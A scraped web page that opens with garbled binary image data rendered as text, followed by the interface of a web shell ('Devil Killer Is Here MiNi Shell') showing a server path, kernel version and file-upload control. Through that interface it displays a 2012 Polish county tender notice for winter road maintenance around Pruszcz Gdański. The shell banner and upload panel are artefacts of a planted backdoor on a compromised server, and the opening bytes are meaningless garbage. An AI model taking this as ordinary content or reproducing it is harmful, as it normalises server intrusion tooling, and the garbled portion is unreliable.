JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120808/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120808/171655-N-2012.html

<p class="kh_header"><b>Pruszcz Gdański: Świadczenie   usług  zimowego  utrzymania  dróg  powiatowych   położonych na terenie Powiatu Gdańskiego w sezonie  zimowym  2012/2013.</b><br>
<b>Numer ogłoszenia: 171655 - 2012; data zamieszczenia: 08.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Gdański z siedzibą w Pruszczu Gdańskim reprezentowany przez Zarząd Powiatu Gdańskiego , ul. Wojska Polskiego 16, 83-000 Pruszcz Gdański, woj. pomorskie, tel. 058 6834999, faks 058 6834899.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-gdanski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie   usług  zimowego  utrzymania  dróg  powiatowych   położonych na terenie Powiatu Gdańskiego w sezonie  zimowym  2012/2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie usług zimowego utrzymania dróg powiatowych położonych na terenie Powiatu Gdańskiego w sezonie zimowym 2012/2013.
2. Szczegółowy zakres przedmiotu zamówienia obejmuje świadczenie usług zimowego utrzymania dróg powiatowych położonych na terenie Powiatu Gdańskiego w 7 obwodach zimowego utrzymania dróg:
1) Zadanie nr 1 - obwód zimowego utrzymania Nr 1 obejmujący drogi powiatowe  o numerach: 2213G, 2224G, 2231G, 2232G, 2233G, 2234G, 2235G, 2236G, 2237G, 2238G,  2239G o łącznej długości do odśnieżania 64,3 km, do posypywania 22,4 km.
2) Zadanie nr 2 - obwód zimowego utrzymania Nr 2 obejmujący drogi powiatowe   
o numerach: 2224G, 2225G, 2226G, 2227G, 2228G, 2229G, 2230G o łącznej długości   do odśnieżania 48,6 km, do posypywania 14,9 km.
3) Zadanie nr 3 - obwód zimowego utrzymania Nr 3 obejmujący drogi powiatowe  o numerach: 2210G, 2214G, 2215G, 2216G, 2217G, 2218G, 2219G, 2220G, 2221G,   2223G, 2240G o łącznej długości do odśnieżania 49,5 km, do posypywania 26,6 km.
4) Zadanie nr 4 - obwód zimowego utrzymania Nr 4 obejmujących drogi powiatowe  o numerach: 2203G, 2206G, 2208G, 2209G, 2210G, 2211G, 2212G, 2222G o łącznej  długości do odśnieżania 42,4 km, do posypywania 14,1 km.
5) Zadanie nr 5 - obwód zimowego utrzymania Nr 5 obejmujących drogi powiatowe  o numerach: 1929G, 1930G, 2202G, 2203G, 2204G o łącznej długości do odśnieżania  18,2 km, do posypywania 8 km.
6) Zadanie nr 6 - obwód   zimowego   utrzymania   Nr   6  obejmujących drogi powiatowe o numerach: 1933G,   2200G,   2201G,   2205G,   2206G,   2207G o łącznej długości do odśnieżania 33,1 km, do posypywania 15 km.
 7)   Zadanie  nr  7 -   obwód  zimowego  utrzymania Nr 7 obejmujący drogę powiatową o numerze  2215G  na  odcinku   Juszkowo  -  Borzęcin o  łącznej  długości  2,2  km , do posypywania 1 km.
3. Szczegółowy opis poszczególnych obwodów zimowego utrzymania dróg: znajduje się w tabelach str. 3, 4 i 5 SIWZ.
4. W  przypadku  wystąpienia  gołoledzi  Wykonawca  zobowiązany  będzie  do posypywania   materiałem uszorstniającym drogi powiatowe na całej ich długości i szerokości.
5. W przypadku  intensywnych opadów śniegu lub zawiei śnieżnych, których skutkiem będzie  brak  przejezdności na drodze Wykonawca winien użyć sprzętu ciężkiego (pług wirnikowy,  równiarka, ładowarka lub spycharka) za pomocą, którego przywróci przejezdność drogi
6. Wykonawca  zapewni  odśnieżanie  nawierzchni  dróg  na  całej  ich  szerokości  i  długości zapewniając ich przejezdność. 
7. W    szczególnych    przypadkach  Wykonawca   zobowiązany   będzie   do   odśnieżania   z jednoczesnym posypywaniem na całej szerokości i długości dróg powiatowych.
8. Świadczenie  usług  zimowego  utrzymania  dróg  musi  być zapewnione przez 24h na dobę      przy  zapewnieniu   ciągłej  przejezdności   dróg   powiatowych   na   całej   ich   długości  i szerokości.   Świadczenie   usług   odbywać   się    będzie    przy    użyciu:   ciągników   lub  samochodów  ciężarowych,  piaskarek  lub rozrzutników, pługów lekkich, pługów średnich lub  wirnikowych,  równiarek  lub  spycharek,  ładowarek  typu  ciężkiego. Wykonawca we własnym zakresie zapewni sprzęt i wykonanie usług zgodnie z powyższym opisem. 
9. Wybrany    Wykonawca     zapewni     w    ramach    niniejszego    zamówienia   mieszankę  piaskowo   -  solną   o   20 %   zawartości   soli w piasku. Wykonawca będzie zobowiązany posypywać  mieszanką  piaskowo  - solną  w  ilości   0,7 t/km drogi.
10.Wykonawcy muszą zapewnić świadczenie usług zimowego utrzymania dróg powiatowych  położonych  na  terenie  Powiatu  Gdańskiego w sezonie zimowym 2012/2013 tym samym należy wkalkulować w cenę oferty koszt związany z dojazdem do poszczególnych dróg..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie  z  art. 36  ust. 2,  pkt.  3  ustawy,  Zamawiający  przewiduje  możliwość  udzielenia w okresie trwania umowy ewentualnych zamówień uzupełniających w trybie z wolnej ręki, których wartość nie przekroczy 50% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt. 6 ustawy PZP.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium wnosi się przed upływem terminu składania ofert.
Wykonawca zobowiązany jest do wniesienia wadium w wysokości 2.300,00 zł (słownie: dwa tysiące trzysta złotych  00/100 ) dla obwodu 1-4 i obwodu nr 6, a dla obwodu nr 5 w wysokości 1.700,00zł (słownie: jeden tysiąc siedemset złotych 00/100) ,najpóźniej w dniu składania ofert przed godz. 11.30 dnia 26.09.2012r. 
Na obwód nr 7 Zamawiający nie wymaga wniesienia wadium do postępowania</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni warunek za spełniony, gdy Wykonawca  posiada  uprawnienia  do  prowadzenia działalności gospodarczej w zakresie  robót  budowlanych  drogowych, a w przypadku podmiotu mającego siedzibę poza granicami RP - zezwolenie właściwego organu na prowadzenie takiej działalności.
Ocena spełnienia warunku udziału w postępowaniu dokonana będzie wg formuły spełnia/ nie spełnia na podstawie wyniku badania treści żądanego przez Zamawiającego dokumentu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Informacje i formalności konieczne do dokonania oceny spełniania wymogów:
W celu potwierdzenia warunku posiadania niezbędnej wiedzy i doświadczenia, dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania przedmiotu zamówienia Wykonawca składa oświadczenie o spełnieniu warunków udziału                                 w postępowaniu określonych w art. 22 ust 1. Ustawy, (zał. nr 3 do SIWZ):
-załączą do oferty wykaz wykonywanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy -  tym okresie,  minimum 2 usług,  odpowiadających swym rodzajem i wartością przedmiotowi zamówienia (z podaniem ich wartości, oraz daty i miejsca wykonania) zimowego utrzymania dróg o wartości nie mniejszej niż    50.000 zł każda dla każdego z obwodów (nr 1 do 6), a na obwód nr 7 na kwotę łączną nie mniejszą niż 15.000 zł. Do wykazu (zał. nr 4 do SIWZ) należy dołączyć dokumenty potwierdzające, że usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  oceni   warunek  za  spełniony, gdy Wykonawcy ubiegający się o zamówienie załączą do oferty wykaz narzędzi i urządzeń technicznych dostępnych Wykonawcy usług w celu realizacji zamówienia tj.:
Obwód nr 1-6
- ciągnik lub samochód ciężarowy            			- minimum 1 szt.
- piaskarka lub rozrzutnik                       		             - minimum 1 szt.
- pług lekki			                		          		 - minimum 1 szt.
- pług średni lub pług wirnikowy                                           - minimum 1 szt.
- równiarka, spycharka lub ładowarka typu ciężkiego 	 - minimum 1 szt.
Obwód nr 7
- ciągnik lub koparka                                                             - minimum 1 szt.
- urządzenie do posypywania                                                - minimum 1 szt.
W tym celu należy do oferty dołączyć dla każdego z zadań (obwodów zimowego utrzymania dróg) wypełniony załącznik  nr 6 do SIWZ oraz w celu udokumentowania dysponowania własnym lub użyczonym sprzętem Wykonawca zobowiązany jest wypełnić załącznik nr 6A do SIWZ. W przypadku korzystania przez Wykonawcę z użyczonego sprzętu, należy załączyć zobowiązanie użyczającego, o przekazaniu sprzętu na cały okres wykonywania przedmiotu zamówienia.
Ocena spełnienia warunku udziału w postępowaniu dokonana będzie wg formuły spełnia/ nie spełnia na podstawie wyniku badania treści żądanego przez Zamawiającego  wykazu usług oraz wykazu narzędzi i urządzeń wypełnionego przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga dokumentów potwierdzających spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni warunek za spełniony, gdy Wykonawca wykaże, że posiada opłacone ubezpieczenie od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności gospodarczej, a w przypadku jej braku innego dokumentu potwierdzającego,  że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości co najmniej 100.000 zł. 
Ubezpieczenie winno obowiązywać  przez cały okres wykonywania przedmiotu zamówienia.
Ocena spełnienia warunku udziału w postępowaniu dokonana będzie wg formuły spełnia/ nie spełnia na podstawie wyniku badania treści żądanego przez Zamawiającego dokumentu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy (wzór zał. nr 1a/1b/1c/1d/1e/1f/1g do SIWZ),
2. Wykaz wykonanych/wykonywanych usług (wzór zał. nr 4 do SIWZ),
3. Podpisany wzór umowy (załącznik nr 5 do SIWZ),
4. Wykaz narzędzi i urządzeń (wzór zał. nr 6 do SIWZ ),
5. Oświadczenie o dysponowaniu własnym/użyczonym sprzętem (wzór zał. nr 6A do SIWZ)
6. Formularz cenowy (wzór zał. nr 7a/7b/7c/7d/7e/7f/7g do SIWZ),
7. Potwierdzenie  wniesienia wadium: potwierdzenie dokonanego przelewu lub oryginał wraz z potwierdzoną kopią dokumentu stanowiącego wadium.
UWAGA;
Zaświadczenie z KRK  z zapisem  że nie figuruje w kartotece karnej Krajowego Rejestru Karnego  będzie potwierdzeniem niekaralności w całym wymaganym zakresie, w tym również nowych przesłanek wskazanych w art.24 ust 1 pkt 10 i 11 Ustawy. 
UWAGA:
W  przypadku  Wykonawców  prowadzących  jednoosobową  działalność gospodarczą lub wspólników spółki cywilnej, po wyborze najkorzystniejszej oferty, a przed podpisaniem umowy  wybrany Wykonawca zobowiązany jest dostarczyć do Zamawiającego aktualny odpis z  Centralnej Ewidencji i Informacji o Działalności Gospodarczej Rzeczpospolitej Polskiej w celu prawidłowego przygotowania umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 Ustawy Prawo Zamówień Publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w wyniku następującego  zdarzenia: 
a) wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie  mającym wpływ na realizację przedmiotu zamówienia, w tym zmiany stawki podatku VAT, mające wpływ na wysokość ceny brutto za świadczoną usługę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-gdanski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, pok. nr 122..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.09.2012 godzina 11:30, miejsce: Starostwo Powiatowe w Pruszczu Gdańskim, ul. Wojska Polskiego 16, 83 - 000 Pruszcz Gdański, Sekretariat pok. Nr 101.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie   usług  zimowego  utrzymania  dróg  powiatowych   położonych na terenie Powiatu Gdańskiego w sezonie  zimowym  2012/2013..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 - obwód zimowego utrzymania Nr 1 obejmujący drogi powiatowe  o numerach: 2213G, 2224G, 2231G, 2232G, 2233G, 2234G, 2235G, 2236G, 2237G, 2238G,  2239G o łącznej długości do odśnieżania 64,3 km, do posypywania 22,4 km..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest świadczenie usług zimowego utrzymania dróg powiatowych 
położonych na terenie Powiatu Gdańskiego w sezonie zimowym 2012/2013..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 - obwód zimowego utrzymania Nr 2 obejmujący drogi powiatowe   
o numerach: 2224G, 2225G, 2226G, 2227G, 2228G, 2229G, 2230G o łącznej długości   do odśnieżania 48,6 km, do posypywania 14,9 km..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiotem zamówienia jest świadczenie usług zimowego utrzymania dróg powiatowych 
położonych na terenie Powiatu Gdańskiego w sezonie zimowym 2012/2013..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3 - obwód zimowego utrzymania Nr 3 obejmujący drogi powiatowe  o numerach: 2210G, 2214G, 2215G, 2216G, 2217G, 2218G, 2219G, 2220G, 2221G,   2223G, 2240G o łącznej długości do odśnieżania 49,5 km, do posypywania 26,6 km..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przedmiotem zamówienia jest świadczenie usług zimowego utrzymania dróg powiatowych 
położonych na terenie Powiatu Gdańskiego w sezonie zimowym 2012/2013.</p>
